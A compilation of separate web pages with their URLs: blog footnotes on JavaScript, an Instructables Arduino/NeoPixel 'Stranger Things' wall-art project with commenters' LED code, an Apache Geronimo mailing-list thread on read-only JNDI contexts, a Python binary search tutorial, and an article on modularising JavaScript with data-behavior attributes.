[1] Or ducky-typed, as the case may be…

[2] That is, if we want to. We can use Either for lots of things. Not just errors and exceptions. They just happen to be a common use case.

[3] I’ve written a step-by-step guide on how to use Array methods. It tells you the exact array function to call in different circumstances. And it’s a free PDF download. Check it out at A Civilised Guide to JavaScript Array Methods.

[4] Using dflt rather than default is deliberate. default is a reserved word in JavaScript. To use it as an object key, we’d have to put quotes around it. And I’m too lazy for that.

[5] This may be much less of an issue if you're using something like TypeScript or Flow.

[6] And in case you're wondering, yes, I do plan to write something about React and functional programming in future.
https://jrsinclair.com/articles/2020/whats-more-fantastic-than-fantasy-land-static-land/
Introduction: Stranger Things Interactive Wall Art

hello everyone, here is a great beginner arduino + neopixel "art hack" - you can bring any art form into life with this very simple instructable. I decided to create the christmas light wall decoration from the netflix show "stranger things". it has an onboard usb rechargeable battery, so you can hang it up anywhere and still be able to demonstrate your art.!! it also has a mini button to shuffle through pre-recorded spellings :)

materials needed: few feet of thin solid core wire

involves using hot glue + soldering (learn)

let's make > please vote for this post on the LED contest

Step 1: Design

included zip file includes the 2D vector drawings, and how I aligned the lights on the board, to figure out exact drilling spots. i used adobe illustrator to design.

i cut the parts using a local CNC machine. you can easily use hand tools to cut the parts, just be careful.. or even better search for a local makerspace, become a member and make something AWESOME. remember to sand everything nice and smooth :)

print the PDF file, which includes the picture to print and glue on the board. use US letter size paper and do not choose "fit to page" on print settings.

Step 2: Place Lights

we start assembly by hot gluing the neopixels to the frame

Step 3: Start Wiring

follow the diagram and take your time, especially if you are new to soldering. you can use hot glue to first lay down the wire and secure it into place.

Step 4: Circuit

here is the full circuit. you can recharge the battery like a cell phone. and then use the usb cable to power the arduino either from the battery or from any usb outlet.

remember:
- all the 5V + positive wires from the lights come together as one into arduino 5V pin
- all the GND - negative wires from the lights come together as one into arduino GND pin
- data in for first led goes into D6 on arduino
- capacitor - negative leg goes to arduino GND pin with the light wires
- capacitor + positive leg goes to arduino 5V pin with the light wires
- resistor goes just before the first LED's Din pin
- button 1 leg goes to GND
- button opposite leg goes to D4 on arduino

hot glue the battery to a place where the usb cable can easily connect

Step 5: Program

here is the arduino code; feel free to comment below for help if you are new to arduino

Step 6: Place the Print

before gluing anything, place the print on the board to see if everything is aligned right. if you hold it up to ambient light, you should see it come through the paper. i used cardstock paper to make it more durable & spray glue to secure it down on the wooden board.

Step 7: Lights On

assemble rest of the frame to give it more of a picture frame look. now go ahead turn it on & hang it up :)

hope you enjoyed it and that this instructable will spark your creativity. please share, favorite + follow.!!

Thank you Akin for this amazing instructable! I made a Stranger Things Casemod and used this on my project. You can see more here:

good stuff, thank you for sharing.!!

weird, uno is ok to use, same thing. did you install the neopixel library correctly? also are you powering the lights correctly?

Hello, I wanted to write when I saw a Turkish name. Wishing you success :)

Hi I am wanting to make this. But I want it bigger around 22x16 inches. Your source files cncparts.ai gave me an error "Could not find linked file "stranger things wall.png"". I was hoping to edit it possibly for bigger printing. How did you make it originally? I also noticed it was pixelated in areas which would look even worse when blown up. Any suggestions?

yes the picture i used isn't big enough for such large prints... search google "stranger things alphabet wall" maybe you can find a bigger image. good luck

Hi Akin (and others)! My LEDs came in, and I've been able to start testing. The C9 format is exactly what I wanted, and they are working great.
They are 12V, so I did need to run additional power independently (I may ask you some additional hardware questions later)!

For the code, here's a quick clean up of what you provided. The "for" loop is useful if you want to set all LEDs to the same colour (or turn them all off). It isn't necessary for turning individual lights on and off. Hopefully you can make sense of what I've done, and re-do your code snippets in the instructable. In another week or so, I'll share the updated code I'm doing, so the lights will blink, and do patterns, and hopefully have a simplified way of entering messages. Thanks again.

```cpp
#include <Adafruit_NeoPixel.h>

#define PIN 6

Adafruit_NeoPixel strip = Adafruit_NeoPixel(27, PIN, NEO_GRB + NEO_KHZ800);

void setup() {
  strip.begin();
  strip.show(); // Initialize all pixels to 'off'
}

void loop() { // main arduino loop - this keeps repeating
  // set all colours to christmas colors
  strip.setPixelColor(0, 105, 105, 105);  // A - white
  strip.setPixelColor(1, 0, 0, 105);      // B - blue
  strip.setPixelColor(2, 105, 0, 0);      // C - red
  strip.setPixelColor(3, 0, 80, 105);     // D - light blue
  strip.setPixelColor(4, 0, 0, 105);      // E - blue
  strip.setPixelColor(5, 105, 105, 25);   // F - yellow
  strip.setPixelColor(6, 105, 0, 0);      // G - red
  strip.setPixelColor(7, 0, 0, 105);      // H - blue
  strip.setPixelColor(8, 0, 0, 105);      // I - blue
  strip.setPixelColor(9, 105, 0, 0);      // J - red
  strip.setPixelColor(10, 0, 0, 105);     // K - blue
  strip.setPixelColor(11, 105, 105, 105); // L - white
  strip.setPixelColor(12, 105, 105, 25);  // M - yellow
  strip.setPixelColor(13, 105, 0, 0);     // N - red
  strip.setPixelColor(14, 105, 0, 0);     // O - red
  strip.setPixelColor(15, 0, 80, 105);    // P - light blue
  strip.setPixelColor(16, 105, 0, 0);     // Q - red
  strip.setPixelColor(17, 0, 80, 105);    // R - light blue
  strip.setPixelColor(18, 105, 105, 105); // S - white
  strip.setPixelColor(19, 105, 105, 25);  // T - yellow
  strip.setPixelColor(20, 0, 0, 105);     // U - blue
  strip.setPixelColor(21, 105, 0, 0);     // V - red
  strip.setPixelColor(22, 0, 0, 105);     // W - blue
  strip.setPixelColor(23, 105, 105, 25);  // X - yellow
  strip.setPixelColor(24, 105, 0, 0);     // Y - red
  strip.setPixelColor(25, 105, 0, 0);     // Z - red
  strip.setPixelColor(26, 255, 0, 255);   // empty - none
  strip.show();
  delay(1000);

  // turn all colours off
  for (int i = 0; i < 26; i++) { // loops through LED 'i' setting all to 0,0,0 (off)
    strip.setPixelColor(i, 0, 0, 0);
  }
  strip.show();
  delay(1000);

  // turn on and off individual lights --- RIGHT ---
  strip.setPixelColor(17, 0, 80, 105); // R - light blue
  strip.show();
  delay(600);
  strip.setPixelColor(17, 0, 0, 0);    // R - off
  strip.setPixelColor(8, 0, 0, 105);   // I - blue
  strip.show();
  delay(600);
  strip.setPixelColor(8, 0, 0, 0);     // I - off
  strip.setPixelColor(6, 105, 0, 0);   // G - red
  strip.show();
  delay(600);
  strip.setPixelColor(6, 0, 0, 0);     // G - off
  strip.setPixelColor(7, 0, 0, 105);   // H - blue
  strip.show();
  delay(600);
  strip.setPixelColor(7, 0, 0, 0);       // H - off
  strip.setPixelColor(19, 105, 105, 15); // T - yellow
  strip.show();
  delay(600);
  strip.setPixelColor(19, 0, 0, 0);      // T - off
  strip.show();
  delay(1100);

  // turn on and off individual lights --- HERE ---
  strip.setPixelColor(7, 0, 0, 105);   // H - blue
  strip.show();
  delay(600);
  strip.setPixelColor(7, 0, 0, 0);     // H - off
  strip.setPixelColor(4, 0, 0, 105);   // E - blue
  strip.show();
  delay(600);
  strip.setPixelColor(4, 0, 0, 0);     // E - off
  strip.setPixelColor(17, 0, 80, 105); // R - light blue
  strip.show();
  delay(600);
  strip.setPixelColor(17, 0, 0, 0);    // R - off
  strip.setPixelColor(4, 0, 0, 105);   // E - blue
  strip.show();
  delay(600);
  strip.setPixelColor(4, 0, 0, 0);     // E - off
  strip.show();
  delay(2100);

  // turn on and off individual lights --- RUN ---
  strip.setPixelColor(17, 0, 80, 105); // R - light blue
  strip.show();
  delay(600);
  strip.setPixelColor(17, 0, 0, 0);    // R - off
  strip.setPixelColor(20, 0, 0, 105);  // U - blue
  strip.show();
  delay(600);
  strip.setPixelColor(20, 0, 0, 0);    // U - off
  strip.setPixelColor(13, 105, 0, 0);  // N - red
  strip.show();
  delay(600);
  strip.setPixelColor(13, 0, 0, 0);    // N - off
  strip.show();
  delay(2100);
}
```

Here's a better version if you install the FastLED library:

```cpp
#include <FastLED.h>

template<typename T, size_t N>
constexpr size_t countof(const T (&)[N]) { return N; }

CRGB leds[50];

// Christmas light colors
CRGB colors[] = {
  0xFFA500, // yellow
  0xFFFFFF, // white
  0x008000, // green
  0x00FFFF, // aqua
  0xFF0000, // red
  0x0000FF, // blue
};

// An array to store which color is at which index is
// used so that the color of each LED stays the same.
// Values are generated in setup().
uint8_t index[countof(leds)];

void setup() {
  for (auto &color : colors) napplyGamma_video(color, 2.2);
  index[0] = random8(countof(colors));
  for (size_t i = 1; i < countof(leds); i++) {
    index[i] = random8(countof(colors) - 1);
    if (index[i] == index[i - 1]) index[i] = countof(colors) - 1;
  }
  FastLED.addLeds<WS2811, 6, RGB>(leds, countof(leds));
  FastLED.setBrightness(255);

  // Fill and show LEDs
  for (size_t i = 0; i < countof(leds); i++) leds[i] = colors[index[i]];
  FastLED.show();

  // Message trigger
  delay(5000);

  // Finally clear the array so that the LEDs don't
  // relight when we show our message
  FastLED.clear();
}

void loop() {
  // Spaces are moved to before the message so that there's a pause
  // after the flicker. Could be replaced with a delay() in setup().
  FastLED.clear();
  write(" Message One");
  write(" Message Two");
  write(" Message Three");

  // Fill and show LEDs
  for (size_t i = 0; i < countof(leds); i++) leds[i] = colors[index[i]];
  FastLED.show();

  // Message trigger
  delay(4000);
}
```
This accounts for LED pixels skipped or not used for the 2nd and 3rd rows (and may not be needed):

```cpp
int getIndex(char c) {
  c = toUpperCase(c);
  switch (c) {
    case 'A' ... 'H': return 50 - (c - 'A');
    case 'I' ... 'P': return 30 + (c - 'I');
    case 'Q': return 39;
    case 'R' ... 'Y': return 26 - (c - 'R');
    case 'Z': return 17;
    default:
      // Should never happen, but is here to avoid compiler warnings
      return 0;
  }
}

void write(char c) {
  if (isAlpha(c)) {
    // Get index and convert to 0-based indexing
    int i = getIndex(c) - 1;
    leds[i] = colors[index[i]];
    FastLED.show();
    delay(750);
    leds[i] = CRGB::Black;
    FastLED.show();
    delay(250);
  } else if (isSpace(c)) {
    delay(1000);
  }
}

void write(const char *str) {
  while (*str) write(*str++);
}
```

thank you for sharing the code. sorry for the late response, instructables didn't email me about this comment.. i normally reply back same day :(

great stuff.!! thank you for sharing the code

I really need to find the time to try this. So cool!

please do, thank you for your interest.. sorry for the late response, instructables didn't email me about this comment.. i normally reply back same day :(

Hi Akin! Thanks for posting this! I had the same idea as you and am happy there are others posting code here as that's my next step. I used neopixels and a Circuit Playground from Adafruit. I'm also working on setting up a character array that will be read from, instead of a long line of code. Mine is going to be a Halloween costume so I am putting it on cardboard and wearing it. You can also sew them into a shirt! I got some tiny dollhouse/scrapbooking Holiday lights. I will post some updates this weekend and share my code once I get it going. -Sam

sorry for the late response, instructables didn't email me about this comment.. i normally reply back same day :( very good stuff, hope you got to rock it for halloween.!!

Hey guys so I'm actually building this for an Art Project, and I really want to do this. However I'm completely new to coding and don't know where to get the materials.
Anyone know a spot where I can find them without buying online since I have till Oct 31 to present?

sorry for the late response, instructables didn't email me about this comment.. how did it go, did you present?!

Also, this time of year places like Hobby Lobby or craft stores will have small plastic holiday lights that can be used for scrapbooking and wrapping gifts. That way you don't have to buy actual lights and can save some money. If you go to, you can see if there is a local store you can get them from. Microcenter in the US has neopixels, and various controllers you can use; if you live near one with a stock you don't have to wait for shipping. And for learning code, I would just use the code others have posted to get it working, and learn from how it works. Basic principle of coding for me is: take an input and do stuff to get your required output. I'm still learning myself, but it helps to think of it that way to read code and figure out what is being done to the input. This is a great project to learn from!

I'm real close to finishing this off (I just need to paint the letters onto the board). I'll post some pictures once I do. A couple of changes I made:

- I used foam board and a drill to cut the holes. While a CNCed board would have been better, this was much easier.
- Costco had some christmas strings for $10 which I scrapped for parts. I used my soldering iron to cut the plastic bulbs in half and glued them to a piece of fabric I stretched over the foam board.
- I cleaned up the code a little bit. You can modify it to host any number of phrases and you switch phrases by holding down a button between phrases:

Thanks for your help with this project and I hope my notes can be of help to someone!

Thanks for sharing the code, gremdel! I'm learning code and this is a good intro to switch/case. I wanted to make an array and have it read phrases from that, so glad you are doing that!
I was thinking of making variables and have strip.setPixelColor(Xvariable, Xvariable), but sadly can't have a variable hold two values such as 'uint32_t a = strip.n(0), strip.Color(255, 0, 255);'. I was thinking of doing 26 if/thens of reading from the array and "if a strip.setPixelColor(0, 255,0,0)" (bad syntax, just for example). Not sure if that will work but it would be good practice, even if it doesn't. Doesn't seem as efficient as what you are doing though. Why do you define the letters at the beginning? Wouldn't reading from an array of letters work too without defining them, since ascii is supported in arduino? Or is defining necessary for switch/case? Thanks!

great stuff lotus.!!

> but sadly can't have a variable have two values such as 'uint32_t a = strip.n(0), strip.Color(255, 0, 255);'

No, but one thing I considered was an array of color choices, where I would set it up like this:

uint32_t colorChoices[] = {strip.Color(255,0,0), strip.Color(0,255,0), ...};

Then I could just call colorChoices[LED_S] or whatever to get the color. I ended up using the function because it was easier to read.

> Why do you define the letters at the beginning?

That's a function of how I have things wired up in the back. I tried to keep wires as short as possible so instead of going from A to Z, I go from Z to R, I to Q, and H to A. So calling character - 'A' wouldn't work. For efficiency, if/then vs. switch really isn't much different (the compiler ends up with the same assembly code more or less) but I think switch is easier to read.

Here's some pics. I also changed the code to match light colors, add some flickering lights, and get a brighter sequence:

I'm not 100% pleased with the lettering. The lettering in the show is creepier with dripping paint but since it's on fabric it didn't drip and I didn't want to make it worse by trying to force it. It's going into the window tonight!

thank you very much for all your support on this post, both with comments and code.
and WOW this looks great. just perfect.. sorry for the late response, instructables didn't email me about this comment.. Hi Gremdel. I am having some issues I think it's with the code, but it may well be the arduino. All the lights start flashing after I upload the data to arduino, it starts spelling something out then starts flashing again. the button does nothing noticeable. I have the button connected to D4 and ground. and the signal wire(? the second set of solder points on the lights) connected to D6 and started with LED A. I ohm tested all of them and nothing is shorting. (+5v, Grnd, and data) any pointers would be appreciated. thanks in advance. sorry for the late response, instructables didn't email me about this comment.. the button sketch above is from another similar project :) please use one of the other sketches, starting with the main one to make sure everything works. i was hoping someone would fix the button code to work with this project Are you using the first or second example of code I posted? Either way, did you modify the #defines to match the order of the signal wire? #define PIN(2) and PIN_Switch (a3) yes. However the switch threw errors. (i'm not at the device to give you the exact code.) However switch would only take a 6 for the switch which i'm assuming is the issue now that i'm revisiting it. (i tried both scripts) If you post the code (pastie.org works well) and some pictures of how you wired it, I'm happy to help. Hope that URL works. pics (don't judge me lol): The PIN defines look correct to me. I think you do need to change all the LED defines (for example "#define LED_A (25)" ) to line up with the order of your signal wire. If it's like Akin's original wiring, it's LED_A to (0), LED_B to (1), and so on. I had trouble with the switch so I do have some debugging stuff in the code: Serial.print(digitalRead(PIN_SWITCH)); So if you listen on the serial port while it's running you'll get some debug info.
I'm getting the debug info but nothing happens with the switch. I got it stuck on flicker a few times trying stuff with the code. still no luck. Also my take on the front. Pre letters, not sure how I want them yet. sorry for the late response, instructables didn't email me about this comment.. man great work :) nothing wrong with foam board, i use it all the time. that code looks great, thank you for sharing I'm having the hardest time getting the solder to stick when it does, it's super fragile and breaks off of the LEDs. Are there any tricks to getting it to be secure? I was completely new to soldering with this project. I bought the smallest tip I could find at Radio Shack, and the smallest diameter solder. I touched the tip to each LED and then the solder to form a very small puddle of solder. Then I came back with the wire, reheated the solder and quickly placed the wire down into it. Seemed to work for me. great news, this is a very hard project to learn soldering from. these are very tiny parts, happy to hear it worked out.!!... this is the way i did it (and looks like the way markc did it). minus the alligator clips. go slow, use hot glue (sparingly, it's a pain to remove) to hold the wires down if they keep popping out. i also used an exacto knife blade back to hold the wire down long enough after removal of the iron, to keep it from popping up. (instead of the hot glue. or use both) look at my posts earlier to see what not to do with hot glue. great advice, thank you.!! sorry for the late response, instructables didn't email me about this comment.. as mentioned below tinning the soldering points will definitely help a lot, both on the lights and wires. also make sure that your lights and wires are secured while soldering. they CAN NOT MOVE as you try to solder. i don't know about your skill level, but these are very small parts to learn on :) Any help with debugging? I've finished wiring and uploaded the program. "A" comes on, then "B" starts flashing...
and that's it. Here's a pic of my wiring. Got an ohm meter? check your contacts a positive to z positive, same with ground. then do the data contacts one at a time to check them for shorts. which code did you use? i used gremdel's first post. other than the switch not working it's easy to add phrases. also make sure the program uploads completely from the IDE yes the switch is from another project that does something similar. i figured someone would help out clear that a bit :) and good advice with the multimeter. most likely it's a loose connection.. sorry for the late response, instructables didn't email me about this comment.. most likely the Data out wire from the 2nd LED (B) is loose, or not soldered well. it could be the power line as well after this LED. second most likely is the code, but i doubt you changed anything. can you check to see if in your code you have the right amount of LEDs input, not just 2. if these aren't the issue, your 2nd LED might be faulty (not very likely) but you may have burned it out while soldering. depending on your skill level, they are very small. hope you had it solved by now, let me know, Akin Can you control the wording with this setup? I'm wanting to make a graduation cap that will spell out "Engineer". I could use some tips. Thanks yes you can, i have actually added a bunch of different spellings in the code. it's very simple stuff. my code above is much more basic. the code suggested below might be confusing for a beginner. good luck Yes, but use gremdel's code, it's easy to follow. For changing the wording and adding phrases Hello Akin. Any help for a complete Noob with Arduino? I've downloaded the file you provided which provides me with "button scroll" "goveg" "join makerspace" "right here run" and "strangerthings.ai" When I compile strangerthings.ai I receive a fatal error: Adafruit_NeoPixel.h: No such file or directory Is this a library that needs to be loaded first? Sorry for the request for hand-holding.
http://www.instructables.com/id/Stranger-Things-Interactive-Wall-Art/
I agree with what Dain said. I also believe that, as the spec says, the J2EE component environment should not be writable and we need not provide any option for that either. It is not necessary. Apps can bind to other namespaces.

On 4/26/06, Dain Sundstrom <dain@iq80.com> wrote:
>
> Are you planning on making the J2EE component environment (java:comp/env)
> writable? I can see making the global tree writable, but am
> concerned about making the component environment itself writable.
> The J2EE 1.4 spec page 64 states:
>
> The container must ensure that the application component instances have only
> read access to their environment variables. The container must throw the
> javax.naming.OperationNotSupportedException from all the methods of the
> javax.naming.Context interface that modify the environment naming context
> and its subcontexts
>
> I suppose we could add an optional flag for non-compliant
> applications to allow them to modify their environment, but I think
> the default for the component environment should be read-only.
>
> BTW, I am in favor of making everything else writable.
>
> -dain
>
> On Apr 26, 2006, at 6:32 AM, Manu George wrote:
>
> > Hi, Guillaume
> > I guess if a writable context is implemented still the approach
> > given above should work. As we will be using the ENCConfigBuilder
> > only to populate the ENC during startup the interfaces can be used
> > to refer to the gbeans representing the deployed artefacts.
> > Whatever we will be writing to context from apps would be done
> > after startup of server and lost at shutdown. So there would not
> > be any problem due to geronimo using interfaces to get the GBean
> > names as what we will be adding at runtime will not be gbeans and
> > we will not use ENCConfigBuilder. Am I right?
> >
> > Now a new property for jndiname will also be required in the plans
> > for the connectors.
> > P.S. This property was actually present in the older versions of geronimo
> > but was removed. I also remember david jencks mentioning
> > in the mailing list that he had a working implementation of a
> > context which he removed for some reason.
> >
> > Thanks
> > Manu
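The spec behaviour quoted in this thread is simple to state in code. The following is only an illustrative sketch (not Geronimo's actual implementation, and deliberately not the full javax.naming.Context interface): the container populates the component environment itself, while the application-facing mutators always throw OperationNotSupportedException:

```java
import java.util.HashMap;
import java.util.Map;
import javax.naming.OperationNotSupportedException;

// Toy read-only component environment, for illustration only. A real
// implementation would implement javax.naming.Context in full.
public class ReadOnlyEnv {
    private final Map<String, Object> bindings = new HashMap<>();

    // The container calls this while wiring the component up at startup.
    public void containerBind(String name, Object value) {
        bindings.put(name, value);
    }

    // Application components may look entries up...
    public Object lookup(String name) {
        return bindings.get(name);
    }

    // ...but every modifying operation is rejected, per J2EE 1.4 p. 64.
    public void bind(String name, Object obj) throws OperationNotSupportedException {
        throw new OperationNotSupportedException("java:comp/env is read-only");
    }
}
```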
http://mail-archives.apache.org/mod_mbox/geronimo-dev/200604.mbox/%3C466797bd0604262314r8bce69fk2b3e8c4138221cb4@mail.gmail.com%3E
Today, we will learn a very fast searching algorithm – the binary search algorithm in Python. We will see its logic, how to write it in Python and what makes it so fast.

The Binary Search Algorithm

There is one thing to note before starting: the algorithm requires that the given list be sorted. This is because the sorting tells us whether a number comes before or after another number in the list. Recall how we find words in a dictionary or page numbers in a book. We simply go to a point in the sequence and check if what we need to find is after or before that point; we make guesses like this until we have found the item. Similarly, in Binary Search, we start by looking at the centre of the list. Either we will find the item there, in which case the algorithm is over, or we will know whether the item is after or before the middle item based on how the list is sorted. After this, we will simply ignore the half which is not supposed to have the item we need. And we repeat this process by going to the middle of the other half. Eventually, we will either find the item or there will be no more halves to eliminate, which will end the algorithm either successfully or unsuccessfully. Notice that we are dividing the list into two halves and then eliminating one half; because of this behaviour of the algorithm, it is aptly named Binary Search. Merriam-Webster Dictionary's meaning of "Binary": a division into two groups or classes that are considered diametrically opposite.

Recommended read: Binary search tree algorithm in Python

Theoretical Example of the Binary Search Algorithm

Let us take an example to understand it better:

Given List: 11, 23, 36, 47, 51, 66, 73, 83, 92
To find: 23

- The list has 9 items, so the center one must be in position 5, which is 51.
- 51 is not equal to 23, but it is more than 23. So if 23 is there in the list, it has to be before 51. So we eliminate 51 and all items after it.
- Remaining List: 11, 23, 36, 47
- Now we have 4 items in the list, and depending on how you calculate the center index, it will either tell us that 2 is the center position or 3 is the center position.
- For simplicity, we will calculate the mean of the start and end positions to get the center.
- Here, start = 1 and end = 4, so the mean is 2 (integer part of 2.5).
- So, in position 2, we have 23, which is the item we needed to find. And the algorithm will end and give us the target's position.

Now let us see how the binary search algorithm is coded in Python.

Binary Search in Python

def binary_search(lst, target):
    start = 0
    end = len(lst) - 1
    while start <= end:
        mid = (start + end) // 2
        if lst[mid] > target:
            end = mid - 1
        elif lst[mid] < target:
            start = mid + 1
        else:
            return mid
    return None

Let us go through the algorithm:

- We create a function that takes two arguments, the first one is the list and the second one is the target that we need to find.
- We declare two variables start and end that point to the start (0) and end (length – 1) of the list respectively.
- These two variables are responsible for eliminating items from the search because the algorithm won't consider items outside this range.
- The next loop will continue to find and eliminate items as long as the start is less than or equal to the end, because the only way the start becomes greater than the end is if the item is not on the list.
- Inside the loop, we find the integer value of the mean of start and end, and consider that as the middle item of the list. Now, if the middle item is more than the target, it means that the target can only be present before the middle item. So we set the end of the list as the index before the middle; this way, all indexes after mid, including mid, are eliminated from consideration.
Similarly, if the middle item is less than the target, it means that the target can only be present after the middle item, and in order to eliminate the index mid and all indexes before mid, we set the start variable as the index after mid. If none of the above two cases is true, i.e. if the item at the middle is neither greater nor smaller than the target, then it must be the target. So we simply return the index of this middle item and end the algorithm. If the loop finishes, it means the target was not in the list, and the function simply returns None. Let us see the code perform and check its output.

The Output

We can see that 23 was present in the list numbers, so the function returned its index, which is 2, but 70 was not present in the list, and so the function returned None.

What Makes Binary Search Fast?

Consider a simple searching algorithm like linear search, where we have to go through each item till we find what we are looking for. This means that for larger input sizes, the time it takes to find an item grows in proportion to the input size. Quantifiably, its time complexity is O(n). Time complexity is a way of quantifying how fast or efficient an algorithm is. In the case of Binary Search, its time complexity is O(log₂n), which means that if we double the size of the input list, the algorithm will perform just one extra iteration. Similarly, if the input size is multiplied by a thousand, then the loop will just have to run about 10 more times. Recall that in every iteration, half of the list is eliminated, so it doesn't take very long to eliminate the entire list.

Conclusion

In this tutorial, we studied what Binary Search is, how it got its name, what it exactly does to find items, and how it is so fast. We discussed its efficiency in terms of time complexity, and we saw how to code it in Python. Binary Search is one of many search algorithms, and it is one of the fastest.
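As a cross-check, Python's standard library already ships a binary search building block: the bisect module performs the same logarithmic search. Here is an equivalent lookup written with bisect_left, using the list from the theoretical example above (where 23 sits at index 1):

```python
import bisect

def binary_search_stdlib(lst, target):
    # bisect_left returns the leftmost insertion point for target;
    # if the element already at that point equals target, we found it.
    i = bisect.bisect_left(lst, target)
    if i < len(lst) and lst[i] == target:
        return i
    return None

numbers = [11, 23, 36, 47, 51, 66, 73, 83, 92]
print(binary_search_stdlib(numbers, 23))  # 1
print(binary_search_stdlib(numbers, 70))  # None
```

Like the hand-rolled version, this requires the list to be sorted; unlike it, bisect is implemented in C, so it is usually the better choice in production code.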
I hope you enjoyed learning about Binary Search and see you in the next tutorial.
https://www.askpython.com/python/examples/binary-search-algorithm-in-python
In my last article, back in August 2011, I discussed a method I use to modularise CSS in a website build. In this follow up I'll introduce a means of modularising your JavaScript to make it easier for you and your teams to develop and maintain. This isn't the only way you can do this, but it's a method that's been working for me – and one you could also find useful when trying to organise your projects. Recent browser wars have seemingly focused on JavaScript performance these past few years, and we're using larger quantities of the stuff than ever before. We are moving into an era where we'll be using more and more clientside scripting to handle what have traditionally been seen as server-side things, such as using JS template engines to render HTML. With this in mind, I'd say better organisation of your JavaScript is more important now than ever before. Before we get going, I think it's worth stating that I am no hardcore JavaScript programmer. I am a frontend developer with a design background, although I do seek to improve my JavaScript skill set. This solution was born from trying to make my life easier and so hopefully it can do the same for you.

My old approach

Over the last few years of increasingly using more and more JavaScript on websites, I have been through a fair number of methods for organising my JavaScript, and I was never totally happy with any of them. Common methods I'd use included having one main application.js, a bunch of plug-in JavaScript files, a JavaScript library file (usually jQuery) and then, in a slightly desperate effort to make things easier to read, some functions would often end up splitting off into different JavaScript files. This often left a messy, confusing-looking JavaScript folder. This never really seemed to be a problem while it was all in my memory. But six months later, when I'd have to try to recall what I was thinking at the time of development, it would be a much harder task.
Often each function would have some code that was there to check whether some elements existed or not in order to decide whether to run the rest of the function. Mostly these functions would then be looking for an event – usually click. So, something like:

if ($("#features").length > 0) {
  $("#features a").click(function(e){
    // do something
  });
}

Initially I had JavaScript written on an as-needed basis inside a DOM ready function. This very quickly became unreadable, and I remember one JavaScript file being thousands of lines long and dreading having to look at it. When I realised that this system was proving to be a little unwieldy, I then started to have all the functions I would need outside the DOM ready and just have calls to them in the DOM ready. I thought this would help, but it only created some long files, and made all my variables and functions public. This was fine until I started doing work for AOL, which required all JavaScript to be in namespaced objects. This subsequently led me to reading up about what they were and how to work with them. Having to learn about objects, properties and methods in this way was the impetus to try to step up my JavaScript game. I grew to like the namespaced object method. Every function inside of it was a private function, except for a few returned public methods and a DOM ready inside it to kick off an init() function. This coincided with an effort I was making to reduce the amount of JavaScript I was writing and rely more on better HTML, newer CSS methods and simpler interactions. I came to recognise that I was making my interactions way too complex, simply because I could. As browsers got better at handling JavaScript and the demands of the websites I was building increased, I began writing increasing amounts of JavaScript again. This was when the problem of working with one large JavaScript file showed up again.
Worse, I often found that any other developers I worked with simply reverted to putting globally available functions outside of my nice namespaced object because it was simpler and easier for them. And that made my pretty JavaScript files ugly. When you read this account of how I was organising my JavaScript you can probably draw some parallels with how you may have organised your JavaScript. Generally these application.js files were growing and becoming increasingly difficult to read and maintain.

My current approach

Handily, while working with a team of developers at Pivotal Labs in NYC I saw a new and much better method. Although it might appear that I'm name dropping, I mention Pivotal Labs to acknowledge where I saw this method. I've stolen it. (Well, you can take the man out of Manchester, but not the Manchester out of the man.) At least I'm doing the honourable thing and sharing it with you. The result of this method is a much cleaner and more logical-looking JavaScript directory. All the JavaScript is now split up into different files in a logical folder structure for functions, plug-ins, templates and vendor-supplied JavaScript. You may come up with a more logical structure for your build yourself, but this is how I'm structuring it for now:

- Behaviours are bits of DOM interactions the site needs.
- Templates is a place to put templates for JavaScript rendering engines (Mustache, Dust and so on).
- Plug-ins is where I put any JavaScript plug-ins that I have written for the application.
- Vendor is for keeping library files – here jQuery and any community plug-ins that I won't be updating.

Then, instead of a DOM ready event triggering functions that check for elements on a page and doing something if it finds them, I'm using a different method of wiring everything up. What I'm actually using is an attribute on the elements that need functions, and then looking for that attribute to trigger a function.
Here is how I’m doing this: The HTML DOM elements that have JS functionality associated with them are getting a data-behavior attribute, with a name of a method. In this case it is slider: <section id="features" data-...</section> Behaviour JavaScript files The JavaScript for this method lives in /js/behaviors/directory. I give the filename the same title as the behaviour name in the HTML. This keeps tracking it down and keeping tabs on individual elements much simpler as the process goes on. This is the point on static builds when my amnesia gets the better of me, and I usually forget to update the HTML to include this new JavaScript file and then wonder why it isn’t working. But in my Rails 3 applications it’s done automagically, though you may need to update the included assets in your applications. This can prove incredibly helpful to absent-minded types like me. This new JavaScript file is where I write whatever JavaScript that I want to have interacting with the DOM element, which in this case looks like this: DLN.Behaviors.slider = function(container){ container.slider({ sliderInner: container.find(".features_list"), slideAmount: 990, itemsVisible: 1, currentSet: 1, budge: 0, looping: true, quickLinks: false, speed: 250, selfCentering: false, paginatorClassname: "features_paginator", keyControls: true, onMoveFunction: false });}; This behaviour triggers a plug-in, also named slider, which lives in the /js/plugins/ directory and passes some options into it, where container is the element from the DOM that had the data-behavior. Application JavaScript In order to call these methods and pass the container element into them, we’ll first of all need to construct the objects and make new instances of them. For this, we’ll take a look at my application.js. 
var DLN = window.DLN || {};
DLN.Behaviors = {};

DLN.LoadBehavior = function(context){
  if(context === undefined){
    context = $(document);
  }
  context.find("*[data-behavior]").each(function(){
    var that = $(this);
    var behaviors = that.attr('data-behavior');
    $.each(behaviors.split(" "), function(index, behaviorName){
      try {
        var BehaviorClass = DLN.Behaviors[behaviorName];
        var initializedBehavior = new BehaviorClass(that);
      } catch(e){
        // No Operation
      }
    });
  });
};

DLN.onReady = function(){
  DLN.LoadBehavior();
};

$(document).ready(function(){
  DLN.onReady();
});

So what is happening in this application.js? Let's explore what I have been doing in a little closer detail. For this structure, we need a namespaced object to store our methods in. So I set up an object, DLN, and a Behaviors object within it by using some literal notation:

var DLN = window.DLN || {};
DLN.Behaviors = {};

DLN is simply an initialism of the project name, so you don't have to use it. Just change this to whatever suits your job. New objects inside of the namespaced object can be added – maybe for templates, helper functions or whatever – in the future, depending on what your project needs. On DOM ready the JavaScript runs a method named onReady, which in turn runs the LoadBehavior method:

DLN.onReady = function(){
  DLN.LoadBehavior();
};

$(document).ready(function(){
  DLN.onReady();
});

LoadBehavior sets about looking through the DOM for any element with an attribute of data-behavior:

context.find("*[data-behavior]").each(function(){ ... }

When it finds an element with this attribute it first stores the element in question into a variable, which in turn stores a string of the content of the data-behavior attribute:

var that = $(this);
var behaviors = that.attr('data-behavior');

Storing the element in the variable that allows the element to be passed into the target behaviour later, and is a common way to get around the change of scope, when it turns out that this is not what you want or expect it to be.
